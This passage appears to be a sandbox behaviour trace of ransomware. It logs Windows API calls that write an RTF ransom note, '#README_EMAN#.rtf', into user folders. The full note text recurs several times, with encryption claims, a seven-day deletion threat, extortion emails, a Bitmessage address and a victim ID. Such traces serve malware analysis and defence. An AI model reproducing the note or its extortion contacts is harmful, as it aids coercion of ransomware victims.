\\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.288] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.288] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.289] CloseHandle (hObject=0x2c8) returned 1 [0280.289] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\#readme_eman#.rtf")) returned 0xffffffff [0280.289] GetLastError () returned 0x2 [0280.289] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 